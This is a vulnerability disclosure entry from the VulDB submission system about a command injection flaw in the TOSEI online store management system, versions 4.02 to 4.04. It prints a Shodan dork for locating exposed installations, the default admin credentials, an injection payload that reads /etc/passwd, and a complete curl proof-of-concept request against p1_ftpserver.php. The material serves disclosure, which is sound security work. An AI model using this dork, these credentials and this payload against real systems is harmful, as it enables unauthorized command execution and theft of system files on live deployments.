| タイトル | Tosei Corporation TOSEI online store management system (aka TOSEIネット店舗管理システム) 4.02/4.03/4.04 Command Injection |
|---|
| 説明 | Vendor:
Tosei Corporation (https://www.tosei-corporation.co.jp/)
Product:
TOSEI online store management system (aka TOSEIネット店舗管理システム)
Product documentation:
https://www.tosei-corporation.co.jp/pdf/manual/cl_current/OP_THS-300-WEB.pdf
Version:
4.02/4.03/4.04
Shodan Dorks:
http.favicon.hash:-244067125 http.html:Tosei
Class:
Remote Code Exection
Impact:
Command injection vulnerability allows authenticated attackers execute commands by bypassing internal restrictions through p1_ftpserver.php.
Attack vector:
||cat${IFS}/etc/passwd||
Poc:
The default admin username and password are known to be "contecfws01".
curl -H "Authorization: Basic Y29udGVjZndzMDE6Y29udGVjZndzMDE=" "http://xxx/cgi-bin/p1_ftpserver.php?adr_txt=%7C%7Ccat%24%7BIFS%7D%2Fetc%2Fpasswd%7C%7C&port_txt=0&usr_txt=0&pas_txt=0&dir_txt=0&update=%83e%83X%83g%91%97%90M"
Discoverer:
b0rgch3n (https://github.com/b0rgch3n) |
|---|
| ソース | ⚠️ https://gist.github.com/b0rgch3n/4788c7c429d49095915d84161a157295 |
|---|
| ユーザー | b0rgch3n (UID 72796) |
|---|
| 送信 | 2024年08月07日 05:37 (2 年 ago) |
|---|
| モデレーション | 2024年08月16日 22:45 (10 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 274904 [Tosei Online Store Management System ネット店舗管理システム p1_ftpserver.php 特権昇格] |
|---|
| ポイント | 20 |
|---|